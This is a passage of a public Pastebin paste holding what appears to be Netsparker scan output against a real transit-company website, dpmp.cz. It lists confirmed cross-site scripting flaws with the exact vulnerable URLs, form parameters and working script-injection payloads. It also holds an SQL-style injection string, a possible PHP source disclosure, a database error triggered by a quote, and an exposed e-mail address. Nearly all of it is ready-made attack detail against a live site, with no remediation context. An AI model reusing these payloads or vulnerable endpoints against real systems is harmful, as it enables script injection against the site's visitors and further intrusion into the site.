  597. Parameter Name: captcha_code
  598. Parameter Type: Post
  599. Attack Pattern: "></style><script>alert(9)</script>
  600.  
  601. Severity : Important
  602. Confirmation: Confirmed
  603. Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
  604. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  605. Parameter Name: firstname
  606. Parameter Type: Post
  607. Attack Pattern: '"--></style></script><script>alert(0x00315C)</script>
  608.  
  609. Severity : Important
  610. Confirmation: Confirmed
  611. Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
  612. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  613. Parameter Name: text
  614. Parameter Type: Post
  615. Attack Pattern: '"--></style></script><script>alert(0x0031E0)</script>
  616.  
  617. Severity : Important
  618. Confirmation: Confirmed
  619. Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
  620. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  621. Parameter Name: lastname
  622. Parameter Type: Post
  623. Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
  624.  
  625. Severity : Important
  626. Confirmation: Confirmed
  627. Vulnerable URL: http://www.dpmp.cz/dotazy-a-reklamace/
  628. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  629. Parameter Name: phone
  630. Parameter Type: Post
  631. Attack Pattern: "><script>alert(9)</script>
  632.  
  633. Severity : Important
  634. Confirmation: Confirmed
  635. Vulnerable URL: http://www.dpmp.cz/prubeh-rekonstrukci-lodi-arnost-z-pardubic-detail/odeslani-formulare/
  636. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  637. Parameter Name: formId
  638. Parameter Type: Post
  639. Attack Pattern: 23'"--></style></script><script>alert(0x003321)</script>
  640.  
  641. Severity : Important
  642. Confirmation: Confirmed
  643. Vulnerable URL: http://www.dpmp.cz/objizdna-trasa-mhd/?'"--></style></script><script>alert(0x003292)</script>
  644. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  645. Parameter Name: Query Based
  646. Parameter Type: FullQueryString
  647. Attack Pattern: '"--></style></script><script>alert(0x003292)</script>
  648.  
  649. Severity : Important
  650. Confirmation: Confirmed
  651. Vulnerable URL: http://www.dpmp.cz/seznam-zastavek/?'"--></style></script><script>alert(0x003301)</script>
  652. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  653. Parameter Name: Query Based
  654. Parameter Type: FullQueryString
  655. Attack Pattern: '"--></style></script><script>alert(0x003301)</script>
  656.  
  657. ||| Permanent XSS (Cross-site Scripting)
  658.  
  659. Severity : Important
  660. Confirmation: Confirmed
  661. Vulnerable URL: http://www.dpmp.cz/vyhledavani/?search=hledanĂ˝ text&send='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  662. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  663. Injection URL: http://www.dpmp.cz/vyhledavani/?search='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x002147)%3C/script%3E&send=hledat
  664. Parameter Name: send
  665. Parameter Type: Querystring
  666. Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  667.  
  668. ||| [Possible] Permanent Cross-site Scripting
  669.  
  670. Severity : Important
  671. Confirmation: Confirmed
  672. Vulnerable URL: http://www.dpmp.cz/vyhledavani/?fast_search=1&search='+NSFTW+'
  673. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  674. Injection URL: http://www.dpmp.cz/vyhledavani/?fast_search=1&search='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00074D)%3C/script%3E
  675. Parameter Name: search
  676. Parameter Type: Querystring
  677. Attack Pattern: '+NSFTW+'
  678.  
  679. ||| [Possible] PHP Source Code Disclosure
  680.  
  681. Severity : Medium
  682. Confirmation: Confirmed
  683. Vulnerable URL: http://www.dpmp.cz/content/image.php?uid=4f8f26bf5c57e
  684. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  685.  
  686. ||| Database Error Message
  687.  
  688. Severity : Low
  689. Confirmation: Confirmed
  690. Vulnerable URL: http://www.dpmp.cz/napiste-nam/odeslani-formulare/
  691. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
  692. Parameter Name: formId
  693. Parameter Type: Post
  694. Attack Pattern: %27
  695.  
  696. ||| E-mail Address Disclosure
  697.  
  698. Severity : Information
  699. Confirmation: Confirmed
  700. Vulnerable URL: http://www.dpmp.cz/novinky/
  701. Found E-mails: design@wizards.cz
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!